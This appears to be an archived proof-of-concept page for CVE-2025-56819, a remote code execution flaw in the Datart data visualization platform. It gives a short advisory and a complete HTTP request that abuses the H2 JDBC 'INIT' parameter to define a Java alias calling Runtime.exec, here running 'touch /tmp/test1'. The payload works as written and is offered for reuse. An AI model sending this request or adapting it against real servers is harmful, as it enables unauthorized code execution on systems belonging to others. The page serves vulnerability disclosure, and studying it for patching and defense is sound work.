CVE-2025-56819 PoC — datart 安全漏洞

Source

https://github.com/xyyzxc/CVE-2025-56819

Associated Vulnerability

Title:datart 安全漏洞 (CVE-2025-56819)
Description:datart是running-elephant开源的一个数据可视化开放平台。 datart 1.0.0-rc.3版本存在安全漏洞，该漏洞源于INIT连接参数处理不当，可能导致执行任意代码。

Description

An issue in Datart v.1.0.0-rc.3 allows a remote attacker to execute  arbitrary code via the INIT connection parameter.

Readme

# CVE-2025-56819
An issue in Datart v.1.0.0-rc.3 allows a remote attacker to execute  arbitrary code via the INIT connection parameter.

```
 POST /api/v1/data-provider/test HTTP/1.1
 Host: test.com:8080
 Content-Type: application/json
 Content-Length: 520

 {
   "name": "jdbc-data-provider",
   "type": "JDBC",
   "properties": {
     "dbType": "H2",
     "url": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'void cmd_exec(String cmd) throws java.lang.Exception {Runtime.getRuntime().exec(cmd)\\;}'\\;CALL EXEC ('touch /tmp/test1')\\;",
     "user": null,
     "password": "",
     "driverClass": "org.h2.Driver",
     "serverAggregate": false,
     "enableSpecialSQL": false,
     "enableSyncSchemas": true,
     "syncInterval": "60",
     "properties": {}
   }
 }
```

File Snapshot


 [4.0K]  /data/pocs/708818b7bdd9670da102d0de5b3372aeb06ca5c9
└── [ 798]  README.md

1 directory, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!